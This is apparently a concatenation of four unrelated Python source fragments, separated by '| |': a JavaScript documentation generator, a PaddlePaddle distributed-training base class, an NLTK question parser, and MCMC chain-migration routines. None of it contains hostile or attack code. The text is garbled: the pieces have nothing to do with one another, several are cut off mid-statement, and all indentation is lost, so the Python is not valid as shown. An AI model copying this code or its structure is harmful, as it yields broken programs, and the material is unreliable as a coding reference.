param: The parameter.
Returns:
a (string, dict) pair. The string is the comments minus the param parts.
The dict is a dict of param names to comments.
"""
collecting_key = None
param_comments = {}
comments = []
comment_lines = func.attributes['__docs'].splitlines()
for line in comment_lines:
match = _doxygen_tag_re.match(line)
if match:
if match.group(1) == 'param':
match = _param_re.match(line)
if match:
collecting_key = match.group(1)
param_comments[collecting_key] = match.group(2)
else:
log.SourceError(func,
('Incorrect format for param ' +
'comment for param "%s" on function "%s"') %
(param_name, func.name))
else:
comments += [line]
collecting_key = None
elif collecting_key:
param_comments[collecting_key] += '\n' + line
else:
comments += [line]
return '\n'.join(comments), param_comments
def GetParamSpec(obj, param_name):
"""Gets the parameter specification string for a function parameter.
Args:
obj: The function.
param_name: The name of the paramter.
Returns:
a string in JSDOC format for the parameter.
"""
type = GetFunctionParamType(obj, param_name)
return '@param {%s} %s ' % (type, naming.Normalize(param_name, naming.Java))
def GetReturnSpec(obj, flags):
"""Gets the return type specification string for a function.
Args:
obj: The function.
flags: An map of flags. The only one we care about is 'eat_lines' which
we'll set to True if the 'noreturndocs' attribute exists.
Returns:
a string in JSDOC format for the return type.
"""
if gflags.FLAGS['no-return-docs'].value and 'noreturndocs' in obj.attributes:
flags['eat_lines'] = True
return ''
if obj.type_defn:
type = GetFullyQualifiedTypeName(obj.type_defn)
else:
type = "**unknown return type**"
return '@return {%s}' % type
class JavascriptFileWriter(object):
"""Javascript file writer class.
This class helps with generating a Javascript file by parts, by allowing
delayed construction of 'sections' inside the code, that can be filled later.
For example one can create a section for forward declarations, and add code to
that section as the rest of the file gets written.
It also provides facility to add #include lines, and header guards for header
files, as well as simplifies namespace openning and closing.
It helps 'beautifying' the code in simple cases.
"""
class Section(object):
"""Javascript writer section class."""
# this regexp is used for EmitTemplate. It maps {#SomeText} into 'section'
# groups and the rest of the text into 'text' groups in the match objects.
_template_re = re.compile(
r"""
^\s* # skip whitespaces
(?: # non grouping ( )
\$\{\#(?P<section>[_A-Za-z0-9]*)\} # matches a '${#AnyText}' section
# tag, puts the 'AnyText' in a
# 'section' group
| # ... or ...
(?P<text>.*) # matches any text, puts it into
# a 'text' group
) # close non-grouping ( )
\s*$ # skip whitespaces
""", re.MULTILINE | re.VERBOSE)
def __init__(self, indent_string, indent):
"""Inits a JavascriptFileWriter.Section.
Args:
indent_string: the string for one indentation.
indent: the number of indentations for code inside the section.
"""
self._indent_string = indent_string
self._code = []
self._fe_namespaces = []
self._be_namespaces = []
self._section_map = {}
self._indent = indent
self._need_validate = False
def EmitSection(self, section):
"""Emits a section at the current position.
When calling GetLines, the code for the section passed in will be output
at this position.
Args:
section: the | |
#!/usr/bin/python
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import sys
import os
import re
import commands
import logging
import time
import numpy as np
import paddle
import paddle.fluid as fluid
import paddle.fluid.incubate.fleet.base.role_maker as role_maker
from paddle.fluid.incubate.fleet.parameter_server.distribute_transpiler import fleet
from paddle.fluid.transpiler.distribute_transpiler import DistributeTranspilerConfig
import py_reader_generator as py_reader
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s')
logger = logging.getLogger("fluid")
logger.setLevel(logging.INFO)
class FleetDistRunnerBase(object):
"""
Distribute training base class:
This class abstracts the training process into several major steps:
1. input_data: input data of network, this function should be realized by user
2. net: network definition, this function should be defined by user
3. run_pserver: run pserver node in distribute environment
4. run_trainer: run trainer, choose the way of training network according to requirement params
5. run_infer: prediction based on the trained model
6. py_reader: using py_reader method get data, this function should be realized by user
7. dataset_reader: using dataset method get data, this function should be realized by user
8. runtime_main: program entry, get the environment parameters, decide which function to call
"""
def input_data(self, params):
"""
Function input_data: Definition of input data format in the network
Args:
:params: the hyper parameters of network
Returns:
defined by users
"""
raise NotImplementedError(
"input_data should be implemented by child classes.")
def net(self, inputs, params):
"""
Function net: Definition of network structure
Args:
:inputs: input data, eg: dataset and labels. defined by funtion: self.input_data
:params: the hyper parameters of network
Returns:
evaluation parameter, defined by users
"""
raise NotImplementedError(
"net should be implemented by child classes.")
def run_pserver(self, params):
"""
Function run_pserver: Operation method of parameter server
Args
:params the hyper parameters of network
Returns:
None
"""
logger.info("run pserver")
role = role_maker.UserDefinedRoleMaker(
current_id=params.current_id,
role=role_maker.Role.SERVER,
worker_num=params.trainers,
server_endpoints=params.pserver_endpoints)
fleet.init(role)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
reader = None
inputs = self.input_data(params)
feeds = []
if params.is_pyreader_train:
reader = self.py_reader(params)
inputs = fluid.layers.read_file(reader)
elif not params.is_dataset_train:
raise ValueError("Program must has Date feed method: is_pyreader_train / is_dataset_train")
loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
optimizer = fluid.optimizer.Adam(params.learning_rate)
optimizer = fleet.distributed_optimizer(optimizer, self.strategy)
optimizer.minimize(loss)
fleet.init_server()
logger.info("PServer init success!")
with open("pserver_train.proto",'w') as f:
f.write(str(fleet.main_program))
with open("pserver_startup.proto",'w') as f:
f.write(str(fleet.startup_program))
fleet.run_server()
def run_dataset_trainer(self, params):
"""
Function run_dataset_trainer: Operation method of training node
Args:
:params params: the hyper parameters of network
Returns
:train_result: the dict of training log
"""
logger.info("run trainer")
role = role_maker.UserDefinedRoleMaker(
current_id=params.current_id,
role=role_maker.Role.WORKER,
worker_num=params.trainers,
server_endpoints=params.pserver_endpoints)
fleet.init(role)
inputs = self.input_data(params)
# For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network
# Replace it with your network evaluation index,
# Oops, function: self.net don't forget return the input_data, we will use it in function: self.run_infer
loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
# define the optimizer for your model
optimizer = fluid.optimizer.Adam(params.learning_rate)
optimizer = fleet.distributed_optimizer(optimizer,self.strategy)
optimizer.minimize(loss)
logger.info("Program construction complete")
exe = fluid.Executor(fluid.CPUPlace())
fleet.init_worker()
exe.run(fleet.startup_program)
CPU_NUM = int(params.cpu_num)
USE_CUDA = params.use_cuda
with open(str(params.current_id)+"_trainer_train.proto",'w') as f:
f.write(str(fleet.main_program))
with open(str(params.current_id)+"_trainer_startup.proto",'w') as f:
f.write(str(fleet.startup_program))
train_result = {}
# Notice: Both dataset and py_reader method don't using feed={dict} to input data
# Paddle Fluid enter data by variable name
# When we do the definition of the reader, the program has established the workflow
logger.info("run dataset train")
dataset = self.dataset_reader(inputs, params)
file_list = [str(params.train_files_path) + "/%s" % x
for x in os.listdir(params.train_files_path)]
if params.is_local_cluster:
file_list = fleet.split_files(file_list)
logger.info("file list: {}".format(file_list))
print("file list: {}".format(file_list))
print('------------------------------------')
print('-----------%s trainer ready---------'%(params.current_id))
print('------------------------------------')
for epoch in range(params.epochs):
dataset.set_filelist(file_list)
if not params.is_local_cluster and params.barrier_level == 2:
print("add epoch barrier")
self.check_all_trainers_ready(epoch)
start_time = time.time()
# Notice: function train_from_dataset does not return fetch value
exe.train_from_dataset(program=fleet.main_program, dataset=dataset,
fetch_list=[auc_var], fetch_info=['auc'],
print_period=100, debug=False)
end_time = time.time()
self.record_time(epoch, train_result, end_time - start_time)
self.record_memory(epoch, train_result)
sys.stderr.write("epoch %d finished, use time=%d\n" % ((epoch), end_time - start_time))
if params.is_first_trainer and params.test:
model_path = str(params.model_path) +'/trainer_'+ str(params.current_id) +'_epoch_'+ str(epoch)
fleet.save_persistables(executor=exe, dirname=model_path)
if not params.is_local_cluster:
self.upload_files(model_path,params)
if params.is_first_trainer:
train_method = '_dataset_train'
log_path = str(params.log_path + '/' + str(params.current_id) + train_method + '_' + str(epoch) + '.log')
with open(log_path, 'w+') as f:
f.write(str(train_result))
if not params.is_local_cluster:
self.upload_files(log_path, params)
logger.info("Train Success!")
fleet.stop_worker()
return train_result
def run_pyreader_trainer(self,params):
"""
Function run_trainer: Operation method of training node
Args:
:params params: the hyper parameters of network
Returns
:train_result: the dict of training log
"""
logger.info("run trainer")
role = role_maker.UserDefinedRoleMaker(
current_id=params.current_id,
role=role_maker.Role.WORKER,
worker_num=params.trainers,
server_endpoints=params.pserver_endpoints)
fleet.init(role)
exe = fluid.Executor(fluid.CPUPlace())
inputs = self.input_data(params)
reader = self.py_reader(params)
inputs = fluid.layers.read_file(reader)
# For the model: ctr-dnn, we use loss,auc,batch_auc to measure the performance of network
# Replace it with your network evaluation index,
# Oops, function: self.net don't forget return the input_data, we will use it in function: self.run_infer
loss, auc_var, batch_auc_var, _ = self.net(inputs, params)
# define the optimizer for your model
optimizer = fluid.optimizer.Adam(params.learning_rate)
optimizer = fleet.distributed_optimizer(optimizer, self.strategy)
optimizer.minimize(loss)
logger.info("Program construction complete")
fleet.init_worker()
exe.run(fleet.startup_program)
CPU_NUM = int(params.cpu_num)
USE_CUDA = params.use_cuda
with open(str(params.current_id)+"_trainer_train.proto",'w') as f:
f.write(str(fleet.main_program))
with open(str(params.current_id)+"_trainer_startup.proto",'w') as f:
f.write(str(fleet.startup_program))
train_result = {}
# Notice: Both dataset and py_reader method don't using feed={dict} to input data
# Paddle Fluid enter data by variable name
# When we do the definition of the reader, the program has established the workflow
train_generator = py_reader.CriteoDataset(params.sparse_feature_dim)
file_list = [str(params.train_files_path) + "/%s" % x
for x in os.listdir(params.train_files_path)]
if params.is_local_cluster:
file_list = fleet.split_files(file_list)
logger.info("file list: {}".format(file_list))
print("file list: {}".format(file_list))
train_reader = paddle.batch(
paddle.reader.shuffle(
train_generator.train(file_list, params.trainers, params.current_id),
buf_size=params.batch_size * 100
), batch_size=params.batch_size)
reader.decorate_paddle_reader(train_reader)
exec_strategy = fluid.ExecutionStrategy()
exec_strategy.num_threads = int(params.cpu_num)
build_strategy = fluid.BuildStrategy()
build_strategy.async_mode = params.async_mode
if params.async_mode:
build_strategy.memory_optimize = False
if CPU_NUM > 1:
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
compiled_prog = fluid.compiler.CompiledProgram(
fleet.main_program).with_data_parallel(
loss_name=loss.name, build_strategy=build_strategy, exec_strategy=exec_strategy)
print('------------------------------------')
print('-----------%s trainer ready---------'%(params.current_id))
print('------------------------------------')
for epoch in range(params.epochs):
reader.start()
if not params.is_local_cluster and params.barrier_level == 2:
print("add epoch barrier")
self.check_all_trainers_ready(epoch)
start_time = time.time()
epoch_loss = 0.0
batch_id = 0
try:
while True:
loss_val, auc_val, batch_auc_val = exe.run(program=compiled_prog,
fetch_list=[loss.name, auc_var.name,
batch_auc_var.name])
loss_val = np.mean(loss_val)
epoch_loss += loss_val
if batch_id % 100 == 0:
print("TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}, queue_size: {}"
.format(epoch, batch_id, loss_val, auc_val, batch_auc_val, reader.queue.size()))
logger.info("TRAIN --> pass: {} batch: {} loss: {} auc: {}, batch_auc: {}, queue_size: {}"
.format(epoch, batch_id, loss_val, auc_val, batch_auc_val, reader.queue.size()))
batch_id += 1
except fluid.core.EOFException:
reader.reset()
end_time = time.time()
if params.test and params.is_first_trainer:
model_path = str(params.model_path) +'/trainer_'+ str(params.current_id) +'_epoch_'+ str(epoch)
fleet.save_persistables(executor=exe, dirname=model_path)
if not params.is_local_cluster:
self.upload_files(model_path,params)
train_result = self.record_time(epoch, train_result, end_time - start_time)
train_result = self.record_memory(epoch, train_result)
train_result[epoch]['loss'] = epoch_loss / float(batch_id)
train_result[epoch]['auc'] = auc_val[0]
sys.stderr.write("epoch %d finished, use time=%d, loss=%f, auc=%f\n"
% ((epoch + 1), end_time - start_time, train_result[epoch]['loss'], train_result[epoch]['auc']))
if params.is_first_trainer:
train_method = '_pyreader_train'
log_path = str(params.log_path + '/' + str(params.current_id) + train_method + '_' + str(epoch) + '.log')
with open(log_path, 'w+') as f:
f.write(str(train_result))
if not params.is_local_cluster:
self.upload_files(log_path,params)
logger.info("Train Success!")
fleet.stop_worker()
return train_result
def check_model_format(self, epoch_id):
pattern = '^trainer_[0-9]+_epoch_[0-9]+$'
if re.match(pattern, epoch_id, re.M|re.I):
return True
else:
return False
def run_local_pyreader(self, params):
place = fluid.CPUPlace()
inputs = self.input_data(params)
#reader = self.py_reader(params)
#inputs = fluid.layers.read_file(reader)
dataset = py_reader.CriteoDataset(params.sparse_feature_dim)
file_list = [str(params.train_files_path) + "/%s" % x
for x in os.listdir(params.train_files_path)]
logger.info("file list: {}".format(file_list))
print("file list: {}".format(file_list))
train_reader = paddle.batch(
dataset.train(file_list, 1, 0), batch_size=params.batch_size)
startup_program = fluid.default_startup_program()
main_program = fluid.default_main_program()
train_result = {}
loss, auc_var, batch_auc_var, data_list = self.net(inputs, params)
optimizer = fluid.optimizer.SGD(params.learning_rate)
optimizer.minimize(loss)
exe = fluid.Executor(place)
exe.run(startup_program)
feeder = fluid.DataFeeder(feed_list=data_list, place=place)
CPU_NUM = params.cpu_num
exec_strategy = fluid.ExecutionStrategy()
exec_strategy.num_threads = CPU_NUM
build_strategy = fluid.BuildStrategy()
if CPU_NUM > 1:
build_strategy.reduce_strategy = fluid.BuildStrategy.ReduceStrategy.Reduce
pe = fluid.ParallelExecutor(
use_cuda=False,
loss_name=loss.name,
main_program=main_program,
build_strategy=build_strategy,
exec_strategy=exec_strategy,
scope=fluid.global_scope())
train_result = {}
logger.info("--------begin------- ")
for epoch in range(params.epochs):
start_time = time.time()
epoch_loss = 0.0
for batch_id, data in | |
print('\t\tJJS : ', tree)
_JJS = tree.leaves()[0][0]
self.condition_object['JJS'] = tree.leaves()[0][0]
for tree in result.subtrees(filter=lambda x: x.label() == 'Target'):
# print('\t\tTarget : ', tree)
_Target = tree.leaves()[0][0]
self.condition_object['condition_target'] = _Target
phrase_to_be_filtered = _JJS + ' ' + _Target
self.condition_filter_stop_words.append(phrase_to_be_filtered)
# print('\t\t', tree_leaves)
def condition_component_scraper(self, tree_leaves):
# The to do list here: 1. replace all number words with digits
grammar = '''JJR: {<JJR>}
CD: {<CD>+<NN|NNS|NNP*>+|<CD>+}
NP: {<NNS|NN|NNP>}
'''
cp = nltk.RegexpParser(grammar)
result = cp.parse(tree_leaves)
# result.draw()
JJR = ([word for word, pos in result.pos() if pos == 'JJR'])
# With in the CD tree, put all the cascading number and time them together.
CDs = ([word for word, pos in result.pos() if pos == 'CD'])
NPs = ([word for word, pos in result.pos() if pos == 'NP'])
# print('=== JJR ===:', JJR)
self.condition_object['Types'].append('value')
self.condition_object['JJR'] = JJR
self.condition_object['NP'] = NPs
value = 1
original_value = ''
there_is_value = False
unit_target = ['']
for cd_index, cd_word in enumerate(CDs):
if cd_word[1] == 'CD':
there_is_value = True
# print('=== CD ====:', cd_word)
if cd_index == 0:
original_value = cd_word[0]
value *= float(cd_word[0])
elif cd_word[1] == 'NNS':
unit_target = cd_word
# print('=== Unit/Target ===:', cd_word)
self.condition_object['condition_target'] = cd_word
if there_is_value:
# print('===VALUE===:', value)
self.condition_object['value'] = value
# print('=== NP ====:', NPs)
# print('====Original Value====')
phrase_to_filter = original_value + ' ' + unit_target[0]
self.condition_filter_stop_words.append(phrase_to_filter.lower())
def replace_word_with_digits(self, sentence):
temp = []
for word in sentence.split(' '):
try:
new_word = w2n.word_to_num(word)
temp.append(str(new_word))
except ValueError:
temp.append(word)
return ' '.join(temp)
def function_indicator_filter(self, tagged_sentence, sentence):
# 1. Filter out SMA (Show me all, Give me all , List me all )
# print('Tagged Sentence', tagged_sentence)
# print('------------------------------')
if tagged_sentence:
first_word_in_sentence = tagged_sentence[0][0].lower().strip()
if first_word_in_sentence in self.general_question_key_words:
print('\t\t------------ GQ -------------')
print('\t\tIdentified a general question')
self.general_question = True
print('\t\t-----------------------------')
if 'list' in sentence.lower():
grammar = '''
SMA:
}<VB>+<IN>+{
{<VB><PRP><PDT>*<DT>*<NN>*<IN>*<DT>*}
}<JJ><NN>*{
WHJ:{<IN>*<WP|WRB|JJ|WDT><RB|JJ>*<NN|NNS>*<VBP|VBD|VBZ|VB>*<DT>*}
'''
else:
grammar = '''
SMA:
}<VB>+<IN>+{
{<VB><PRP><PDT>*<DT>*}
WHJ:{<IN>*<WP|WRB|JJ|WDT><RB|JJ>*<NN|NNS|NNP>*<VBP|VBD|VBZ|VB>*<DT>*}
'''
cp = nltk.RegexpParser(grammar)
result = cp.parse(tagged_sentence)
# result.draw()
for tree in result:
if type(tree) == nltk.Tree:
if tree.label() == 'SMA' and len(tree.leaves()) > 1:
# print('Leaves:', tree.leaves())
joined_phrase = self.join_tree_into_phrases(tree.leaves(), False)
print('--------------------------------------------------------')
print('Inside SMA: new sentence |', sentence.replace(joined_phrase, ''), ' |')
self.SMA_Object['Target'] = sentence.replace(joined_phrase, '')
self.SMA_Object['SMA'] = True
print('--------------------------------------------------------')
return sentence.replace(joined_phrase, '')
elif tree.label() == 'WHJ' and len(tree.leaves()) > 1:
if not ((tree.leaves()[0][1] == 'JJ') and ((tree.leaves()[1][1] == 'NN') or (
tree.leaves()[1][1] == 'NNS')) and (len(tree.leaves()) == 2)):
# print('\n\t\tWHJ: ', self.join_tree_into_phrases(tree.leaves(), False))
self.scrape_out_predicates_and_target_classes_out_of_whj(tree.leaves())
self.filter_out_tokens(tree.leaves())
# return sentence.replace(joined_phrase, '')
def scrape_out_predicates_and_target_classes_out_of_whj(self, tree_leaves):
scrape_grammar = '''
target_class:
{<NN|NNP|NNS>+}
general_question:
{<WP|WRB><VBD>*<JJ>*}
class_question:
{<WDT>}
condition:
{<JJ>}
predicate:
{<VBD|VBZ|VBP>}
'''
cp = nltk.RegexpParser(scrape_grammar)
result = cp.parse(tree_leaves)
stop = set(stopwords.words('english'))
stop.update(['did', 'do', 'does', 'which'])
# result.draw()
# print('\t\t================= WHJ Scraper =================')
for tree in result:
if type(tree) == nltk.Tree:
if tree.label() == 'predicate':
# print('\t\tpredicate: ', tree.leaves())
print()
elif tree.label() == 'condition':
# print('\t\tcondition: ', tree.leaves())
self.general_condition = tree_leaves
self.filter_out_tokens(tree.leaves())
elif tree.label() == 'target_class':
# print('\t\ttarget_class: ', tree.leaves())
self.target_class = tree.leaves()
self.filter_out_tokens(tree.leaves())
self.question_type_recogizer(tree_leaves)
elif tree.label() == 'class_question':
# print('\t\tclass_question: ', tree.leaves())
self.filter_out_tokens(tree.leaves())
self.question_type_recogizer(tree_leaves)
elif tree.label() == 'general_question':
# print('\t\tgeneral_question: ', tree.leaves())
self.identify_hm_question(tree.leaves())
self.question_type_recogizer(tree_leaves)
self.filter_out_tokens(tree.leaves())
# print('\t\t===============================================\n\n')
# TODO: identify what answer does it expect
# result.draw()
def identify_hm_question(self, tree_leaves):
temp = []
temp2 = []
for word in tree_leaves:
temp.append(word[0].strip().lower())
temp2.append(word[1].strip())
phrase = ''.join(temp).strip()
pos = ''.join(temp2).strip()
if phrase == 'howmany':
self.hmq_object = {'type': 'howmany', 'HM': True}
elif pos == 'WRBJJ':
self.hmq_object = {'type': 'howjj', 'HM': True, 'JJ': temp[1].strip().lower()}
def question_type_recogizer(self, tree_leaves):
# print('\n\n\t\t\t\t=========== question_type_recogizer ==============')
for word in tree_leaves:
if word[0].strip().lower() == 'when':
# print('\t\t\t\tYou are expecting a date')
self.expected_class = 'Date'
elif word[0].strip().lower() == 'who':
# print('\t\t\t\tYou are expecting a person')
self.expected_class = 'Person'
elif word[0].strip().lower() == 'whom':
# print('\t\t\t\tYou are expecting a person')
self.expected_class = 'Person'
elif word[0].strip().lower() == 'where':
# print('\t\t\t\tYou are expecting a place')
self.expected_class = 'Place'
elif word[0].strip().lower() == 'what':
# print('\t\t\t\tYou are expecting a thing')
self.expected_class = 'Thing'
# print('\t\t\t\t==================================================\n\n')
def filter_out_tokens(self, leaves):
for word in leaves:
self.stop_words.append(word[0].lower().strip())
def clean_a_list(self, _list):
# print('in clean a list', _list)
stop = set(stopwords.words('english'))
stop.update(['did', 'do', 'does', 'which', 'that', 'place'])
new_list = []
new_list_2 = []
for item in _list:
if type(item) == type(_list):
# this is a list of tuples
if item[0]:
if type(item[0]) == type(('a', 'b')):
a_phrase = (self.join_tree_into_phrases(item, True))
if (a_phrase not in new_list) and len(item) > 0:
new_list.append(a_phrase)
else:
new_list_2.append(item)
elif type(item) == str:
if (item not in new_list) and (item.strip().lower() not in stop) and len(item) > 0:
new_list.append(item)
for phrase in new_list:
array = phrase.split(' ')
temp = []
for word in array:
if word.strip().lower() not in self.stop_words:
temp.append(word.strip())
new_phrase = ' '.join(temp)
new_list_2.append(new_phrase.strip())
# print('new_list_2', new_list_2)
return new_list_2
def join_triple_of_triple(self):
return ''
def make_map_of_tokens(self, _tokens):
# print(_tokens)
map = {}
for _i, token in enumerate(_tokens):
map[token] = _i
return map
def remove_redundant_in_triple_from_condition_filter(self):
# print('condition_filter_stop_words', self.condition_filter_stop_words)
for triple_index, triple in enumerate(self.list_of_NIN_pairs):
raw_triple = triple
triple = triple['triple']
for element_index, triple_element in enumerate(triple):
# if triple_element is a list, else it is a string
if type(triple_element) == type(('a', 'b')):
# print('tuple', triple_element)
print('')
elif type(triple_element) != type([]):
# print(type(triple_element), triple_element)
if element_index == 1 and (
triple_element.strip().lower() == 'more' or triple_element.strip().lower() == 'less' or triple_element.strip().lower() in self.jjr_stop_words):
self.list_of_NIN_pairs.remove(raw_triple)
else:
for stop_word in self.condition_filter_stop_words:
if triple_element.strip().lower() == stop_word.strip().lower():
# print('condition within a triple', raw_triple, element_index)
JJS_word = self.condition_object['JJS'].strip()
triple_object = {'text': triple_element.replace(JJS_word, '').strip(),
'condition_object': self.condition_object}
_triple = self.list_of_NIN_pairs[triple_index]['triple']
_triple_list = list(_triple)
_triple_list[element_index] = triple_object
self.list_of_NIN_pairs[triple_index]['triple'] = tuple(_triple_list)
# TODO:now delay this process
# print('triple_object', triple_object)
def join_cascading_predicates(self):
for predicate_word in self.list_of_predicates_candidate:
predicate_word_index = self.find_index_of_word(predicate_word)
# iterate through triples and find those having predicates, check for cascading predicates
for list_index, subject_element_list in enumerate(self.list_of_subjects_candidate):
if type(subject_element_list) == type([]):
for element_index, subject_element in enumerate(subject_element_list):
if type(subject_element) != type('x'):
if subject_element['predicate']:
predicate_in_subject_index = self.find_index_of_word(subject_element['predicate'])
if abs(predicate_word_index - predicate_in_subject_index) == 1:
# print('p1', predicate_word, 'p2', subject_element['predicate'])
if predicate_word_index > predicate_in_subject_index:
new_predicate = subject_element['predicate'] + ' ' + predicate_word
print('new predicate', new_predicate)
else:
new_predicate = predicate_word + ' ' + subject_element['predicate']
print('new predicate', new_predicate)
# remove word from predicate, update the one in subjects
subject_element['predicate'] = new_predicate
self.list_of_predicates_candidate.remove(predicate_word)
for predicate_word_1 in self.list_of_predicates_candidate:
for predicate_word_2 in self.list_of_predicates_candidate:
index_1 = self.find_index_of_word(predicate_word_1)
index_2 = self.find_index_of_word(predicate_word_2)
if abs(index_1 - index_2) == 1:
if index_1 > index_2:
_new_phrase = [predicate_word_2, predicate_word_1]
else:
_new_phrase = [predicate_word_1, predicate_word_2]
self.list_of_predicates_candidate.remove(predicate_word_1)
self.list_of_predicates_candidate.remove(predicate_word_2)
self.list_of_predicates_candidate.append(_new_phrase)
# remove both predicate_words
def find_index_of_word(self, word):
word = word.strip().lower()
_sentence = self.original_sentence
# print('original sentence ', _sentence)
index = -9
_sentence_array = _sentence.split(' ')
for i, _word in enumerate(_sentence_array):
if word == _word:
return i
return index
def remove_general_question_indicator_from_sentence(self, tokens):
_temp = []
for token in tokens:
if token.strip().lower() not in self.general_question_key_words:
_temp.append(token)
return _temp
def identify_parallel_subjects(self):
# for triple and for sub list
print() # both in subject list
# one in subject list, one in triple
# both in triple list
# 1. Both in sujects
sub_strings_list = []
for sub_idx, sub in enumerate(self.list_of_subjects_candidate):
if type(sub) == type([]):
# sub_string = sub[0]
there_is_object = False
for s in sub:
if type(s) == type({}):
sub_strings_list.append(
{'type': 'sub_list', 'string': s['text'], 'index': sub_idx, 'has_predicate': True})
there_is_object = True
if not there_is_object:
sub_string = sub[0]
sub_strings_list.append(
{'type': 'sub_single', 'string': sub_string, 'index': sub_idx, 'has_predicate': False})
else:
sub_string = sub
sub_strings_list.append(
{'type': 'sub_single', 'string': sub_string, 'index': sub_idx, 'has_predicate': False})
for idx, triple in enumerate(self.list_of_NIN_pairs):
triple_pair = triple['triple']
# print('triple_pair --', triple_pair)
for element_idx, single_element in enumerate(triple_pair):
if type(single_element) == type('x'):
sub_strings_list.append(
{'type': 'triple_string', 'string': single_element, 'index': [idx, element_idx]})
elif type(single_element) == type([]): # a list
sub_strings_list.append(
{'type': 'triple_list', 'string': single_element[0], 'index': [idx, element_idx]})
elif type(single_element) == type({'a': 'b'}): # a obj
sub_strings_list.append(
{'type': 'triple_obj', 'string': single_element['text'], 'index': [idx, element_idx]})
# print()
# print('sub_strings_list', sub_strings_list)
# print()
# print()
self.find_index_of_phrases_and_return_what_is_in_between_and_join_them(sub_strings_list)
def find_index_of_phrases_and_return_what_is_in_between_and_join_them(self, sub_string_list):
there_is_triple = False
one_contain_predicate = False
chosen_triple = ''
chosen_sub = ''
chosen_element = ''
# self.collection_of_cascading_subjects = set()
if len(sub_string_list) >= 2:
length = len(sub_string_list)
for idx, sub_string in enumerate(sub_string_list):
string = | |
newLike = Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[subj,run[subj,:]], data[data['subj'] == subject], params) for subj, subject in enumerate(np.unique(data['subj'])))
for subj in xrange(nSubj): new_like[subj,run[subj,:]] = newLike[subj]
new_weight = prior + new_like
#find all chains to be accepted
accept_idx = np.exp(new_weight - weight) > uniform.rvs(size = (nSubj, nChains))
accept_idx = accept_idx & np.isfinite(new_weight) #only accept chains with finite likelihood
theta[accept_idx], like[accept_idx], weight[accept_idx] = new_theta[accept_idx], new_like[accept_idx], new_weight[accept_idx]
return theta, like, weight
def migration(theta, phiMu, phiSigma, like, data, log_dens_like, params, dist, rp):
nChains, nParams = theta.shape[0], theta.shape[1]
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
weight = like + log_dens_hyper(theta.reshape(1,nChains,nParams), phiMu, phiSigma, dist)
weight = weight.reshape(nChains)
new_like = np.ones(eta) * (-1 * np.inf)
new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1))).reshape(1,len(rotated),nParams) #have to reshape: log_dens_hyper requires subject index first
priorDens = log_dens_hyper(new_theta, phiMu[chains], phiSigma[chains], dist) #evaluate new chains (rotated) under old ones (chains)
priorDens = priorDens.reshape(len(rotated))
run = np.isfinite(priorDens)
new_theta = new_theta.reshape(len(rotated), nParams)
if np.sum(run) > 0: new_like[run] = log_dens_like(new_theta[run], data, params)
new_weight = new_like + priorDens
accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta) #accept_idx is as big as len(chains) and len(rotated)
accept_idx = accept_idx & (np.isfinite(new_weight))
chains = np.array(chains)
theta[chains[accept_idx]] = new_theta[accept_idx]
like[chains[accept_idx]] = new_like[accept_idx]
weight[chains[accept_idx]] = new_weight[accept_idx]
return theta, like, weight
def migrationSubject(theta, like, data, log_dens_like, params, dist, priors, rp, nJobs = -1, parallel = False):
nChains, nParams = theta.shape
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
weight = like + log_dens_prior(theta, priors, dist)
weight = weight.reshape(nChains)
new_like = np.ones(eta) * (-1 * np.inf)
new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1)))
priorDens = log_dens_prior(new_theta, priors, dist) #evaluate new chains (rotated) under old ones (chains)
run = np.isfinite(priorDens)
new_theta = new_theta.reshape(len(rotated), nParams)
new_like = np.zeros(len(chains))
toRun = np.where(run)[0]
if parallel == True:
newLike = np.array(Parallel(n_jobs = nJobs)(delayed(log_dens_like)(new_theta[chain], data, params) for chain in toRun)).flatten()
for c, chain in enumerate(xrange(len(toRun))): new_like[chain] = newLike[c]
else: new_like[run] = log_dens_like(new_theta[run], data, params)
new_weight = new_like + priorDens
accept_idx = np.exp(new_weight - weight[chains]) > uniform.rvs(size = eta) #accept_idx is as big as len(chains) and len(rotated)
chains = np.array(chains)
theta[chains[accept_idx]] = new_theta[accept_idx]
like[chains[accept_idx]] = new_like[accept_idx]
weight[chains[accept_idx]] = new_weight[accept_idx]
return theta, like, weight
def migrationHybrid_subj(theta, phiMu, phiSigma, like, data, log_dens_like, params, hierParams, groupParams, dist, rp):
nChains, nParams = theta.shape[0], theta.shape[1]
eta = max(random.choice(range(1, nChains + 1)), 2) #eta: number of chains to be used: at least 2
k = range(nChains)
random.shuffle(k)
chains = k[:eta]
rotated = chains[1:] + [chains[0]]
weight = like + log_dens_hyper(theta.reshape(1,nChains,nParams)[:,:,hierParams], phiMu, phiSigma, dist).reshape(nChains) #need to index only the hierParams in theta
new_like = np.ones(eta) * (-1 * np.inf)
new_theta = (theta[rotated] + np.random.uniform(-rp,rp,size = (eta,1))).reshape(len(rotated),nParams)
for param in groupParams: new_theta[:,param] = theta[rotated,param]
new_theta = new_theta.reshape(1,len(rotated),len(params))
priorDens = log_dens_hyper(new_theta[:,:,hierParams], phiMu[chains], phiSigma[chains], dist) #evaluate new chains (rotated) under old ones (chains)
priorDens = priorDens.reshape(len(rotated))
